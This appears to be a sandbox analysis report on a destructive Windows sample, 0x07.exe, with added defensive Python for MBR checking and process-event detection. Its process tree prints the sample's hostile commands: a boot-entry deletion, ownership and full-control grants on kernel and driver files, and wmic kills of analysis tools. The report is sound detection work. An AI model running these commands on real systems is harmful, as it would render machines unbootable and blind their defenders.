Analysis
max time kernel: 101s
max time network: 35s
platform: windows7_x64
resource: win7-20230220-en
resource tags: arch:x64, arch:x86, image:win7-20230220-en, locale:en-us, os:windows7-x64, system
submitted: 09/05/2023, 19:02

Static task: static1
Behavioral task: behavioral1 (sample 0x07.exe, resource win7-20230220-en)
Behavioral task: behavioral2 (sample 0x07.exe, resource win10v2004-20230220-en)
General
Target: 0x07.exe
Size: 247KB
MD5: 733eb0ab951ae42a8d8cca413201e428
SHA1: 640ffb3ee44eb86afaea92e6c5aa158a5d4aafd1
SHA256: 52d6d769eb474d4138ac31e05634a6ca7a4ebef5920f8356c1cd70d9fa42c2fb
SHA512: c7cdf77aa881c5dbb2abf17913dbf645fe88e16fa11fa055392d36ccf936fc43050c48feb631e193fe044123a190f123d2d6ff12234c0ff7c8c7c6e290209d8f
SSDEEP: 3072:xaWEHnqlm+0FEaJSq6+ouCpk2mpcWJ0r+QNTBfZnazJ9k3kxMC+89+aPyXiwQ9M1:cWCMm8aMldk1cWQRNTBhz3Yz/qc9M1
Malware Config
Signatures
Possible privilege escalation attempt (25 IoCs)
  takeown.exe  PIDs 1860, 1920, 904, 732, 1524, 848, 1436, 1588, 1072, 268, 576, 1544, 1492
  icacls.exe   PIDs 1960, 1268, 300, 1512, 892, 1908, 2024, 1712, 2016, 864, 1772, 552

Executes dropped EXE (2 IoCs)
  PID 916   winconfig.exe
  PID 432   DetectKey.exe

Loads dropped DLL (1 IoC)
  PID 2004  0x07.exe

Modifies file permissions (1 TTP, 25 IoCs)
  the same 25 processes as under "Possible privilege escalation attempt":
  takeown.exe  PIDs 1920, 1072, 1544, 1436, 1524, 904, 732, 1860, 1492, 268, 576, 1588, 848
  icacls.exe   PIDs 892, 1268, 1960, 1908, 864, 552, 2016, 1512, 1772, 2024, 1712, 300

Modifies boot configuration data using bcdedit (1 IoC)
  PID 588   bcdedit.exe

Writes to the Master Boot Record (MBR) (1 TTP, 1 IoC)
  Bootkits write to the MBR to gain persistence at a level below the operating system.
  PID 2004  0x07.exe   File opened for modification: \??\PhysicalDrive0

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).

Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
  PID 432   DetectKey.exe

Suspicious use of AdjustPrivilegeToken (64 IoCs; table truncated at 64 entries)
  WMIC.exe PID 1072 enabled the following privileges, and then the whole set a second time (40 entries):
    SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege,
    SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege,
    SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege,
    SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege,
    privilege values 33, 34, 35
  WMIC.exe PID 908 enabled the same set once (20 entries) and, before the table is cut off, a second
    SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege (4 entries)

Suspicious use of WriteProcessMemory (64 IoCs; table truncated at 64 entries)
  parent PID  parent process   target PID  procid_target  entries
  2004        0x07.exe         916         29             4
  916         winconfig.exe    1484        30             4
  1484        cmd.exe          432         32             4
  1484        cmd.exe          588         34             3
  1484        cmd.exe          1072        35             3
  1484        cmd.exe          908         37             3
  1484        cmd.exe          1588        38             3
  1484        cmd.exe          1228        39             3
  1484        cmd.exe          1912        40             3
  1484        cmd.exe          632         41             3
  1484        cmd.exe          1156        42             3
  1484        cmd.exe          1472        43             3
  1484        cmd.exe          604         44             3
  1484        cmd.exe          1080        45             3
  1484        cmd.exe          1884        46             3
  1484        cmd.exe          988         47             3
  1484        cmd.exe          1096        48             3
  1484        cmd.exe          1860        49             3
  1484        cmd.exe          268         50             3
  1484        cmd.exe          776         51             3
  1484        cmd.exe          844         52             1 (cut off)
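The "Writes to the Master Boot Record (MBR)" signature above records only that 0x07.exe opened \??\PhysicalDrive0 for modification; it does not show what, if anything, was written to sector 0. The check an incident responder runs on the affected disk is to read sector 0 and compare it with a known-good MBR. The following is an added example, not code from the report or from tria.ge: it parses a 512-byte MBR image and reports deviations from a baseline. The MBR images in it are constructed, and the "known-good" boot-code hash and partition layout are assumptions for the example, not values from the analysed host.

```python
"""Check for the "Writes to the Master Boot Record (MBR)" signature.

Added example, not code from the tria.ge report. parse_mbr() decodes a
512-byte sector 0 (as read from \\.\PhysicalDrive0 or from a disk image) and
mbr_findings() compares it with a known-good baseline. The sample MBRs are
constructed here; the baseline hash and partition layout are assumptions
for the example, not values from the analysed host.
"""
import hashlib
import struct

SECTOR_SIZE = 512
BOOT_CODE_LEN = 446      # bytes 0..445: boot code (the disk signature sits at 440)
PART_TABLE_OFF = 446     # four 16-byte partition entries
BOOT_SIG_OFF = 510       # 0x55 0xAA
PART_FMT = "<B3xB3xII"   # status, CHS start, type, CHS end, LBA start, sector count


def parse_mbr(sector):
    """Decode the boot-code hash, the partition entries and the boot-signature flag."""
    if len(sector) != SECTOR_SIZE:
        raise ValueError("expected %d bytes, got %d" % (SECTOR_SIZE, len(sector)))
    partitions = []
    for i in range(4):
        status, ptype, lba, count = struct.unpack_from(PART_FMT, sector, PART_TABLE_OFF + 16 * i)
        partitions.append({"bootable": status == 0x80, "type": ptype,
                           "lba_start": lba, "sectors": count})
    return {
        "boot_code_sha256": hashlib.sha256(sector[:BOOT_CODE_LEN]).hexdigest(),
        "partitions": partitions,
        "signature_ok": sector[BOOT_SIG_OFF:] == b"\x55\xAA",
    }


def mbr_findings(sector, baseline_boot_code_sha256, baseline_partitions):
    """Return the deviations from baseline; an empty list means sector 0 is unchanged."""
    mbr = parse_mbr(sector)
    findings = []
    if not mbr["signature_ok"]:
        findings.append("boot signature 0x55AA missing: BIOS will refuse to boot this disk")
    if mbr["boot_code_sha256"] != baseline_boot_code_sha256:
        findings.append("boot code differs from baseline: possible bootkit or wiper overwrite")
    if mbr["partitions"] != baseline_partitions:
        findings.append("partition table differs from baseline")
    return findings


def build_mbr(boot_code, partitions, signature=b"\x55\xAA"):
    """Assemble a sector from its parts (used only to build the constructed samples)."""
    buf = bytearray(SECTOR_SIZE)
    code = boot_code[:BOOT_CODE_LEN]
    buf[:len(code)] = code
    for i, p in enumerate(partitions[:4]):
        struct.pack_into(PART_FMT, buf, PART_TABLE_OFF + 16 * i,
                         0x80 if p["bootable"] else 0x00, p["type"], p["lba_start"], p["sectors"])
    buf[BOOT_SIG_OFF:] = signature
    return bytes(buf)


# Constructed known-good disk: a generic boot-loader stub and one bootable NTFS partition.
CLEAN_BOOT_CODE = bytes.fromhex("33c08ed0bc007c") + b"\x90" * (BOOT_CODE_LEN - 7)
CLEAN_PARTITIONS = [{"bootable": True, "type": 0x07, "lba_start": 2048, "sectors": 204800}] + \
                   [{"bootable": False, "type": 0, "lba_start": 0, "sectors": 0}] * 3
CLEAN_MBR = build_mbr(CLEAN_BOOT_CODE, CLEAN_PARTITIONS)
BASELINE_HASH = hashlib.sha256(CLEAN_BOOT_CODE).hexdigest()   # assumed baseline

# Constructed sector 0 after a wiper-style overwrite: new boot code, empty table, no signature.
WIPED_MBR = build_mbr(b"\xb8\x00\x00" + b"DISK UNAVAILABLE".ljust(BOOT_CODE_LEN - 3, b"\x00"),
                      [], b"\x00\x00")

# Constructed bootkit-style overwrite: boot code replaced, partition table and signature kept.
BOOTKIT_MBR = build_mbr(b"\xeb\xfe" + b"\x00" * (BOOT_CODE_LEN - 2), CLEAN_PARTITIONS)

if __name__ == "__main__":
    for name, image in (("clean", CLEAN_MBR), ("wiped", WIPED_MBR), ("bootkit", BOOTKIT_MBR)):
        print(name, mbr_findings(image, BASELINE_HASH, CLEAN_PARTITIONS) or ["no deviation"])
```

On a real host the baseline is the boot code of the same Windows build taken before infection (or from a known-clean machine with the same boot loader), and the partition list comes from the build-time inventory; a bootkit typically keeps the partition table and the 0x55AA signature so the machine still boots, which is why the boot-code hash is the comparison that matters.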
Processes

depth 1  PID 2004  C:\Users\Admin\AppData\Local\Temp\0x07.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\0x07.exe"
  signatures: Loads dropped DLL; Writes to the Master Boot Record (MBR); Suspicious use of WriteProcessMemory

  depth 2  PID 916  C:\Windows\Temp\winconfig.exe
    command line: "C:\Windows\Temp\winconfig.exe"
    signatures: Executes dropped EXE; Suspicious use of WriteProcessMemory

    depth 3  PID 1484  C:\Windows\system32\cmd.exe
      command line: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1FD1.tmp\1FD2.tmp\1FD3.bat C:\Windows\Temp\winconfig.exe"
      signatures: Suspicious use of WriteProcessMemory

      depth 4  children of PID 1484, in creation order (signatures in brackets):
        PID 432   C:\Users\Admin\AppData\Roaming\DetectKey.exe   "C:\Users\Admin\AppData\Roaming\DetectKey.exe"   [Executes dropped EXE; Suspicious behavior: CmdExeWriteProcessMemorySpam]
        PID 588   C:\Windows\system32\bcdedit.exe   bcdedit /delete {current}   [Modifies boot configuration data using bcdedit]
        PID 1072  C:\Windows\System32\Wbem\WMIC.exe   wmic process where name='taskmgr.exe' delete /nointeractive   [Suspicious use of AdjustPrivilegeToken]
        PID 908   C:\Windows\System32\Wbem\WMIC.exe   wmic process where name='perfmon.exe' delete /nointeractive   [Suspicious use of AdjustPrivilegeToken]
        PID 1588  C:\Windows\System32\Wbem\WMIC.exe   wmic process where name='mmc.exe' delete /nointeractive
        PID 1228  C:\Windows\System32\Wbem\WMIC.exe   wmic process where name='PartAssist.exe' delete /nointeractive
        PID 1912  C:\Windows\System32\Wbem\WMIC.exe   wmic process where name='control.exe' delete /nointeractive
        PID 632   C:\Windows\System32\Wbem\WMIC.exe   wmic process where name='ProcessHacker.exe' delete /nointeractive
        PID 1156  C:\Windows\System32\Wbem\WMIC.exe   wmic process where name='Security Task Manager.exe' delete /nointeractive
        PID 1472  C:\Windows\System32\Wbem\WMIC.exe   wmic process where name='Security Task Manager Protable.exe' delete /nointeractive
        PID 604   C:\Windows\System32\Wbem\WMIC.exe   wmic process where name='CCleaner.exe' delete /nointeractive
        PID 1080  C:\Windows\System32\Wbem\WMIC.exe   wmic process where name='procexp.exe' delete /nointeractive
        PID 1884  C:\Windows\System32\Wbem\WMIC.exe   wmic process where name='procexp64.exe' delete /nointeractive
        PID 988   C:\Windows\System32\Wbem\WMIC.exe   wmic process where name='procexp64a.exe' delete /nointeractive
        PID 1096  C:\Windows\System32\Wbem\WMIC.exe   wmic process where name='logonui.exe' delete /nointeractive
        PID 1860  C:\Windows\System32\Wbem\WMIC.exe   wmic process where name='regedit.exe' delete /nointeractive
        PID 268   C:\Windows\System32\Wbem\WMIC.exe   wmic process where name='iexplore.exe' delete /nointeractive
        PID 776   C:\Windows\System32\Wbem\WMIC.exe   wmic process where name='chrome.exe' delete /nointeractive
        PID 844   C:\Windows\System32\Wbem\WMIC.exe   wmic process where name='firefox.exe' delete /nointeractive
        PID 904   C:\Windows\System32\Wbem\WMIC.exe   wmic process where name='opera.exe' delete /nointeractive
        PID 1780  C:\Windows\System32\Wbem\WMIC.exe   wmic process where name='edge.exe' delete /nointeractive
        PID 1644  C:\Windows\System32\Wbem\WMIC.exe   wmic process where name='msedge.exe' delete /nointeractive
        PID 1340  C:\Windows\System32\Wbem\WMIC.exe   wmic process where name='brave.exe' delete /nointeractive
        PID 1532  C:\Windows\System32\Wbem\WMIC.exe   wmic process where name='wmplayer.exe' delete /nointeractive
        PID 1512  C:\Windows\System32\Wbem\WMIC.exe   wmic process where name='notepad.exe' delete /nointeractive
        PID 976   C:\Windows\System32\Wbem\WMIC.exe   wmic process where name='notepad++.exe' delete /nointeractive
        PID 1316  C:\Windows\System32\Wbem\WMIC.exe   wmic process where name='taskmgr.exe' delete /nointeractive
        PID 1268  C:\Windows\System32\Wbem\WMIC.exe   wmic process where name='perfmon.exe' delete /nointeractive
        PID 1744  C:\Windows\System32\Wbem\WMIC.exe   wmic process where name='logonui.exe' delete /nointeractive
        PID 2008  C:\Windows\System32\Wbem\WMIC.exe   wmic process where name='ProcessHacker.exe' delete /nointeractive
        PID 732   C:\Windows\system32\takeown.exe   takeown /f "C:\Windows\system32\taskmgr.exe"   [Possible privilege escalation attempt; Modifies file permissions]
        PID 1860  C:\Windows\system32\takeown.exe   takeown /f "C:\Windows\system32\hal.dll"   [Possible privilege escalation attempt; Modifies file permissions]
        PID 1920  C:\Windows\system32\takeown.exe   takeown /f "C:\Windows\system32\winload.exe"   [Possible privilege escalation attempt; Modifies file permissions]
        PID 1492  C:\Windows\system32\takeown.exe   takeown /f "C:\Windows\system32\ntoskrnl.exe"   [Possible privilege escalation attempt; Modifies file permissions]
        PID 268   C:\Windows\system32\takeown.exe   takeown /f "C:\Windows\system32\perfmon.exe"   [Possible privilege escalation attempt; Modifies file permissions]
        PID 1072  C:\Windows\system32\takeown.exe   takeown /f "C:\Windows\system32\resmon.exe"   [Possible privilege escalation attempt; Modifies file permissions]
        PID 576   C:\Windows\system32\takeown.exe   takeown /f "C:\Windows\system32\logonui.exe   (closing quote missing in the sample's own command line)   [Possible privilege escalation attempt; Modifies file permissions]
        PID 848   C:\Windows\system32\takeown.exe   takeown /f "C:\Windows\system32\taskkill.exe"   [Possible privilege escalation attempt; Modifies file permissions]
        PID 1544  C:\Windows\system32\takeown.exe   takeown /f "C:\Windows\system32\tasklist.exe"   [Possible privilege escalation attempt; Modifies file permissions]
        PID 1436  C:\Windows\system32\takeown.exe   takeown /f "C:\Windows\system32\tskill.exe"   [Possible privilege escalation attempt; Modifies file permissions]
        PID 1588  C:\Windows\system32\takeown.exe   takeown /f "C:\Windows\system32\logonui.exe"   [Possible privilege escalation attempt; Modifies file permissions]
        PID 1524  C:\Windows\system32\takeown.exe   takeown /f "C:\Program Files\Process Hacker 2"   [Possible privilege escalation attempt; Modifies file permissions]
        PID 904   C:\Windows\system32\takeown.exe   takeown /f "C:\Windows\System32\drivers"   [Possible privilege escalation attempt; Modifies file permissions]
        PID 1228  C:\Windows\System32\Wbem\WMIC.exe   wmic process where name='taskmgr.exe' delete /nointeractive
        PID 1912  C:\Windows\System32\Wbem\WMIC.exe   wmic process where name='perfmon.exe' delete /nointeractive
        PID 940   C:\Windows\System32\Wbem\WMIC.exe   wmic process where name='logonui.exe' delete /nointeractive
        PID 1156  C:\Windows\System32\Wbem\WMIC.exe   wmic process where name='ProcessHacker.exe' delete /nointeractive
        PID 892   C:\Windows\system32\icacls.exe   icacls "C:\Windows\system32\taskmgr.exe" /grant "everyone":F   [Possible privilege escalation attempt; Modifies file permissions]
        PID 1960  C:\Windows\system32\icacls.exe   icacls "C:\Windows\system32\hal.dll" /grant "everyone":F   [Possible privilege escalation attempt; Modifies file permissions]
        PID 1512  C:\Windows\system32\icacls.exe   icacls "C:\Windows\system32\winload.exe" /grant "everyone":F   [Possible privilege escalation attempt; Modifies file permissions]
        PID 1908  C:\Windows\system32\icacls.exe   icacls "C:\Windows\system32\ntoskrnl.exe" /grant "everyone":F   [Possible privilege escalation attempt; Modifies file permissions]
        PID 864   C:\Windows\system32\icacls.exe   icacls "C:\Windows\system32\perfmon.exe" /grant "everyone":F   [Possible privilege escalation attempt; Modifies file permissions]
        PID 1772  C:\Windows\system32\icacls.exe   icacls "C:\Windows\system32\logonui.exe" /grant "everyone":F   [Possible privilege escalation attempt; Modifies file permissions]
        PID 2024  C:\Windows\system32\icacls.exe   icacls "C:\Windows\system32\resmon.exe" /grant "everyone":F   [Possible privilege escalation attempt; Modifies file permissions]
        PID 552   C:\Windows\system32\icacls.exe   icacls "C:\Windows\system32\taskkill.exe" /grant "everyone":F   [Possible privilege escalation attempt; Modifies file permissions]
        PID 1712  C:\Windows\system32\icacls.exe   icacls "C:\Windows\system32\tasklist.exe" /grant "everyone":F   [Possible privilege escalation attempt; Modifies file permissions]
        PID 2016  C:\Windows\system32\icacls.exe   icacls "C:\Windows\system32\tskill.exe" /grant "everyone":F   [Possible privilege escalation attempt; Modifies file permissions]
        PID 1268  C:\Windows\system32\icacls.exe   icacls "C:\Program Files\Process Hacker 2" /q /c /t /grant "everyone":F   [Possible privilege escalation attempt; Modifies file permissions]
        PID 300   C:\Windows\system32\icacls.exe   icacls "C:\Windows\System32\drivers" /q /c /t /grant "everyone":F   [Possible privilege escalation attempt; Modifies file permissions]
        PID 1956  C:\Windows\System32\Wbem\WMIC.exe   wmic process where name='taskmgr.exe' delete /nointeractive
        PID 520   C:\Windows\System32\Wbem\WMIC.exe   wmic process where name='perfmon.exe' delete /nointeractive
        PID 1860  C:\Windows\System32\Wbem\WMIC.exe   wmic process where name='logonui.exe' delete /nointeractive
        PID 880   C:\Windows\System32\Wbem\WMIC.exe   wmic process where name='ProcessHacker.exe' delete /nointeractive
        PID 1800  C:\Windows\system32\cmd.exe   C:\Windows\system32\cmd.exe /S /D /c" echo y"
        PID 848   C:\Windows\system32\cacls.exe   cacls "C:\Windows\system32\taskmgr.exe" /grant "everyone":F
        PID 1544  C:\Windows\system32\cmd.exe   C:\Windows\system32\cmd.exe /S /D /c" echo y"
        PID 844   C:\Windows\system32\cacls.exe   cacls "C:\Windows\system32\hal.dll" /grant "everyone":F
        PID 1380  C:\Windows\system32\cmd.exe   C:\Windows\system32\cmd.exe /S /D /c" echo y"
        PID 820   C:\Windows\system32\cacls.exe   cacls "C:\Windows\system32\ntoskrnl.exe" /grant "everyone":F
        PID 1084  C:\Windows\system32\cmd.exe   C:\Windows\system32\cmd.exe /S /D /c" echo y"
        PID 904   C:\Windows\system32\cacls.exe   cacls "C:\Windows\system32\perfmon.exe" /grant "everyone":F
        PID 1144  C:\Windows\system32\cmd.exe   C:\Windows\system32\cmd.exe /S /D /c" echo y"
        PID 1976  C:\Windows\system32\cacls.exe   cacls "C:\Windows\system32\logonui.exe" /grant "everyone":F
        PID 1228  C:\Windows\system32\cmd.exe   C:\Windows\system32\cmd.exe /S /D /c" echo y"
        PID 1248  C:\Windows\system32\cacls.exe   cacls "C:\Windows\system32\resmon.exe" /grant "everyone":F
        PID 1728  C:\Windows\system32\cmd.exe   C:\Windows\system32\cmd.exe /S /D /c" echo y"
        PID 924   C:\Windows\system32\cacls.exe   cacls "C:\Windows\system32\taskkill.exe" /grant "everyone":F
        PID 1340  C:\Windows\system32\cmd.exe   C:\Windows\system32\cmd.exe /S /D /c" echo y"
        PID 1816  C:\Windows\system32\cacls.exe   cacls "C:\Windows\system32\tasklist.exe" /grant "everyone":F
        PID 632   C:\Windows\system32\cmd.exe   C:\Windows\system32\cmd.exe /S /D /c" echo y"
        PID 1552  C:\Windows\system32\cacls.exe   cacls "C:\Windows\system32\tskill.exe" /grant "everyone":F
        PID 1540  C:\Windows\system32\cmd.exe   C:\Windows\system32\cmd.exe /S /D /c" echo y"
        PID 896   C:\Windows\system32\cacls.exe   cacls "C:\Program Files\Process Hacker 2" /grant "everyone":F
        PID 1404  C:\Windows\system32\cmd.exe   C:\Windows\system32\cmd.exe /S /D /c" echo y"
        PID 892   C:\Windows\system32\cacls.exe   cacls "C:\Windows\System32\drivers" /grant "everyone":F

Reading notes:
  - Every "cmd.exe /S /D /c" echo y"" process is immediately followed by a cacls.exe process. That is the shape cmd.exe gives the left-hand side of a pipeline, so the batch file is running `echo y | cacls ...` to answer the confirmation prompt cacls prints when it replaces an ACL (cacls, unlike icacls, has no quiet switch).
  - The batch file runs the same permission change three ways (takeown, then icacls /grant, then cacls /grant) against the same list of targets: Task Manager and its alternatives, the kernel and boot loader images (ntoskrnl.exe, hal.dll, winload.exe), LogonUI, the task* tools, the Process Hacker install directory and the drivers directory. Together with `bcdedit /delete {current}` and the open handle to \??\PhysicalDrive0 this is consistent with a destructive payload rather than a persistence mechanism.
  - PIDs are reused within the run on this Windows 7 image (for example 1072 is first a WMIC.exe and later a takeown.exe; 1860, 1228, 1912, 1156, 904, 848, 844, 632, 892, 1268, 1512, 1544, 1588 and 268 likewise appear for more than one image). Identify a process here by PID together with image and command line, not by PID alone.
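The process tree above is what a detection engineer turns into rules: bcdedit deleting the current boot entry, takeown followed by icacls or cacls granting Everyone full control on files under System32, and a loop of `wmic process where name='...' delete` calls aimed at analysis tools and browsers. The block below is an added example of that logic, not code from the report or from tria.ge. It runs over process-creation events (the fields of Sysmon Event ID 1 or Windows 4688: pid, ppid, image, command line) constructed from the command lines above plus two benign administrator commands that must not fire, and attributes each finding to its full parent chain. The event list, the rule names and the PROTECTED_DIRS and ANALYSIS_TOOLS lists are assumptions for the example.

```python
"""Detection logic for the behaviours in the process tree above.

Added example, not code from the tria.ge report. Command-line rules are run
over process-creation events (Sysmon Event ID 1 / Windows 4688 fields) and
each finding is attributed to its parent chain. EVENTS is constructed from
command lines in the report plus two benign admin commands; it is not an
export from the sandbox.
"""
import re
from collections import defaultdict

EVENTS = [  # constructed; a representative subset of the report's process tree
    {"pid": 2004, "ppid": 1000, "image": r"C:\Users\Admin\AppData\Local\Temp\0x07.exe",
     "cmd": r'"C:\Users\Admin\AppData\Local\Temp\0x07.exe"'},
    {"pid": 916, "ppid": 2004, "image": r"C:\Windows\Temp\winconfig.exe",
     "cmd": r'"C:\Windows\Temp\winconfig.exe"'},
    {"pid": 1484, "ppid": 916, "image": r"C:\Windows\system32\cmd.exe",
     "cmd": r'"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1FD1.tmp\1FD2.tmp\1FD3.bat C:\Windows\Temp\winconfig.exe"'},
    {"pid": 588, "ppid": 1484, "image": r"C:\Windows\system32\bcdedit.exe", "cmd": "bcdedit /delete {current}"},
    {"pid": 1072, "ppid": 1484, "image": r"C:\Windows\System32\Wbem\WMIC.exe",
     "cmd": "wmic process where name='taskmgr.exe' delete /nointeractive"},
    {"pid": 632, "ppid": 1484, "image": r"C:\Windows\System32\Wbem\WMIC.exe",
     "cmd": "wmic process where name='ProcessHacker.exe' delete /nointeractive"},
    {"pid": 776, "ppid": 1484, "image": r"C:\Windows\System32\Wbem\WMIC.exe",
     "cmd": "wmic process where name='chrome.exe' delete /nointeractive"},
    {"pid": 1492, "ppid": 1484, "image": r"C:\Windows\system32\takeown.exe",
     "cmd": r'takeown /f "C:\Windows\system32\ntoskrnl.exe"'},
    {"pid": 576, "ppid": 1484, "image": r"C:\Windows\system32\takeown.exe",
     "cmd": r'takeown /f "C:\Windows\system32\logonui.exe'},  # unterminated quote, as in the report
    {"pid": 1908, "ppid": 1484, "image": r"C:\Windows\system32\icacls.exe",
     "cmd": r'icacls "C:\Windows\system32\ntoskrnl.exe" /grant "everyone":F'},
    {"pid": 300, "ppid": 1484, "image": r"C:\Windows\system32\icacls.exe",
     "cmd": r'icacls "C:\Windows\System32\drivers" /q /c /t /grant "everyone":F'},
    {"pid": 820, "ppid": 1484, "image": r"C:\Windows\system32\cacls.exe",
     "cmd": r'cacls "C:\Windows\system32\ntoskrnl.exe" /grant "everyone":F'},
    # benign administrator activity that must not fire
    {"pid": 3001, "ppid": 3000, "image": r"C:\Windows\system32\icacls.exe",
     "cmd": r'icacls "C:\inetpub\logs" /grant "IIS_IUSRS":(OI)(CI)M'},
    {"pid": 3002, "ppid": 3000, "image": r"C:\Windows\system32\bcdedit.exe", "cmd": "bcdedit /enum"},
]

# Assumed lists for the example; tune them to the estate being monitored.
PROTECTED_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64", r"c:\program files")
ANALYSIS_TOOLS = {"taskmgr.exe", "procexp.exe", "procexp64.exe", "processhacker.exe",
                  "regedit.exe", "perfmon.exe", "resmon.exe", "mmc.exe"}
WMIC_DELETE = re.compile(r"wmic\s+process\s+where\s+name\s*=\s*['\"]([^'\"]+)['\"]\s+delete", re.I)
GRANT_EVERYONE = re.compile(r'/grant(?::r)?\s+"?(everyone|\*S-1-1-0)"?:\S*F', re.I)
BCD_DELETE_CURRENT = re.compile(r"/delete\s+\{?current\}?", re.I)


def basename(path):
    return path.rsplit("\\", 1)[-1]


def target_path(cmd):
    """First path argument of takeown/icacls/cacls; tolerates an unterminated quote."""
    args = cmd.split(None, 1)[1] if " " in cmd else ""
    m = re.search(r'"([^"]+)"?', args)
    if m:
        return m.group(1)
    return next((tok for tok in args.split() if "\\" in tok), "")


def in_protected_dir(path):
    return path.lower().startswith(PROTECTED_DIRS)


def ancestry(pid, by_pid):
    """Parent chain 'root > ... > pid' built from the images seen in the events."""
    names, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        names.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return " > ".join(reversed(names))


def evaluate(events):
    """One finding per matching event, plus one per parent running a WMI kill loop."""
    by_pid = {e["pid"]: e for e in events}
    findings, wmi_kills = [], defaultdict(set)

    def add(ev, rule, detail):
        findings.append({"pid": ev["pid"], "rule": rule, "detail": detail,
                         "chain": ancestry(ev["pid"], by_pid)})

    for ev in events:
        image, cmd = basename(ev["image"]).lower(), ev["cmd"]
        if image == "bcdedit.exe" and BCD_DELETE_CURRENT.search(cmd):
            add(ev, "boot_entry_deleted", cmd)
        elif image == "wmic.exe":
            m = WMIC_DELETE.search(cmd)
            if m:
                wmi_kills[ev["ppid"]].add(m.group(1).lower())   # aggregate per parent
        elif image == "takeown.exe" and in_protected_dir(target_path(cmd)):
            add(ev, "takeown_on_system_path", target_path(cmd))
        elif (image in ("icacls.exe", "cacls.exe") and GRANT_EVERYONE.search(cmd)
              and in_protected_dir(target_path(cmd))):
            add(ev, "everyone_full_control_on_system_path", target_path(cmd))
    for ppid, targets in wmi_kills.items():
        tools = sorted(targets & ANALYSIS_TOOLS)
        if tools or len(targets) >= 5:   # a kill loop, not a one-off admin action
            parent = by_pid.get(ppid, {"pid": ppid, "image": "?", "ppid": None})
            add(parent, "process_kill_loop_via_wmic",
                "%d targets; analysis tools: %s" % (len(targets), ", ".join(tools) or "none"))
    return findings


if __name__ == "__main__":
    for f in evaluate(EVENTS):
        print("%-40s pid=%-5s %s  (%s)" % (f["rule"], f["pid"], f["detail"], f["chain"]))
```

The parent chain is the part worth keeping in the alert: `0x07.exe > winconfig.exe > cmd.exe > bcdedit.exe` tells the responder which dropped binary to pull, while a bare `bcdedit.exe` event does not. The WMI rule is aggregated per parent because a single `wmic process ... delete` is ordinary administration; the sandbox run is flagged by the breadth of targets and by the presence of analysis tools among them.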
Network
MITRE ATT&CK Enterprise v6
Downloads

File 1
  Filesize: 5KB
  MD5: a645734f3bf4a2682cbaf546789ec0c4
  SHA1: fafcc11909412bf51f217e12dfaa93a15181a3e2
  SHA256: 3b9b5b1659a881d15962541fb56638379a6e5b5d02435f8c50574ec003bc64b0
  SHA512: efa399503b982eda2058a70b10289275fe3c51280bdbb649be40cc3f17c6085267236dc0f6f8bbbf782105e6f5510e6dbbd97de8e87113abc1d8c340ccad9a6d

File 2 (listed twice in the report)
  Filesize: 87KB
  MD5: aba9a3cf4e1db4602c25405987b809a6
  SHA1: 6cd545ea023ce9cdfe76607c6801cc11ff7d9e80
  SHA256: 490df924cadff4806ad1c1a261c71f7e06320826eda532394462e7ee32c570d6
  SHA512: e5a9e28549bab93f5cf2464707b3b46859271dea16f69e8757b00f79989b2665d3b9bc3d9794d1d9e1111f8ee03ecb933f1fadfcd2adeb695dc0fce0b8f90675

File 3 (listed twice in the report)
  Filesize: 139KB
  MD5: 11d457ee914f72a436fa4a8a8f8446dd
  SHA1: d0308ca82ed9716b667e8e77e9ae013b9af44116
  SHA256: c55e98b21e7e8639d4a6702de75bccc47b337bc639ea33231a507946f74964ef
  SHA512: 4c861cb0fa7170d6c71e11b3a826d1802ff0f9d029cfefa7428655929d5bab4bf56abeeb963e4927def3e959f2d4a0f199c8c3bf3ecbef8885189a52eeef666b